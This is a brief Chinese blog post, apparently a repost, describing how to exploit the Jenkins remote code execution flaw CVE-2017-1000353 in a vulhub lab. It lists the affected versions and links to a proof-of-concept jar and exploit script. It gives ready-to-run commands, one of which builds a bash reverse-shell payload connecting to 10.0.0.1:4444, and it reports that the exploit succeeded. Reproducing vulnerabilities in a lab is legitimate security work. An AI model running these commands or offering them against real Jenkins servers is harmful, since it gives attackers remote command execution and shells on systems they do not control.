Jenkins-CI 远程代码执行漏洞（CVE-2017-1000353）

标签：版本   图片   view   releases   doc   命令执行漏洞   width   image   创建   

影响范围

所有Jenkins主版本均受到影响(包括<=2.56版本)

所有Jenkins LTS 均受到影响( 包括<=2.46.1版本)

poc下载

https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py

执行命令

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

或者

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

python3 exploit.py http://192.168.49.2:8080 jenkins_poc.ser

进入docker，发现/tmp/success成功被创建，说明命令执行漏洞利用成功：

Jenkins-CI 远程代码执行漏洞（CVE-2017-1000353）

标签：版本   图片   view   releases   doc   命令执行漏洞   width   image   创建   

原文地址：https://www.cnblogs.com/bingtang123/p/14463798.html